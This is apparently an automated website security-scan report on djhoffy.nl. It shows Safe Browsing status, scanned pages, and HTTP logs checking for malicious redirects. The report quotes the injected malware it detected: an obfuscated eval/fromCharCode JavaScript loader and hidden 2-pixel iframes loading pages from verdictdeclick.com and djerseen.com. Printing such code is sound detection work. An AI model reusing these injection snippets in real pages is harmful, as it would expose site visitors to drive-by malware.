Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=djhoffy.nl
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://djhoffy.nl/ | 200 OK Content-Length: 39141 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: verdictdeclick.com try{vfE++;}catch(ABWTE){try{GZDG|15232}catch(ewabgre){m=Math;ev=window[""+"e"+"val"];}ff="fromCha";ff+="rCode";n="1624&&1710&&1694&&1845&&1652&&1530&&966&&645&&602&&885&&1750&&1485&&1358&&1740&&1386&&1560&&560&&975&&924&&1305&&1176&&1035&&574&&1845&&1624&&17 ...[9422 bytes skipped]... Decoded script: ...[40961 bytes skipped]... amp;1400&&1740&&1456&&915&&476&&750&&476&&930&&840&&705&&1470&&1530&&1596&&1455&&1526&&1515&&868&&585&&574&&885&&182&&150".split("&&");h=2;s="";if(m)for(i=0;i-198!=0;i=1+i){k=i;s+=String[ff](n[i]/(i%h+016));}ev(s);} document.write('<iframe src="http://verdictdeclick.com/links/especially-reserved-increasing.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://verdictdeclick.com/links/especially-reserved-increasing.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); <iframe src="http://verdictdeclick.com/links/especially-reserved-increasing.php" name="Twitter" scrolling="aut ...[503 bytes skipped]... Hidden iFrame found. style: hidden src: http://djerseen.com/referer.php?id={778175be-c525-4b22-be1e-bc64cf7f4e73} <iframe style="visibility: hidden; display: none; display: none;" src="http://djerseen.com/referer.php?id={778175be-c525-4b22-be1e-bc64cf7f4e73}"> | ||
http://djhoffy.nl/test404page.js | 404 Not Found Content-Length: 956 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: djhoffy.nl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 22:47:26 GMT
Accept-Ranges: bytes
ETag: "5008028-98e5-4c9bf340c4b00"
Server: Apache/2.2.26 (Unix)
Content-Length: 39141
Content-Type: text/html
Last-Modified: Sat, 15 Sep 2012 15:29:16 GMT
X-Pad: avoid browser bug
...39141 bytes of data.
GET / HTTP/1.1
Host: djhoffy.nl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 22:47:26 GMT
Accept-Ranges: bytes
ETag: "5008028-98e5-4c9bf340c4b00"
Server: Apache/2.2.26 (Unix)
Content-Length: 39141
Content-Type: text/html
Last-Modified: Sat, 15 Sep 2012 15:29:16 GMT
X-Pad: avoid browser bug
...39141 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: djhoffy.nl
Referer: http://www.google.com/search?q=djhoffy.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: djhoffy.nl
Referer: http://www.google.com/search?q=djhoffy.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.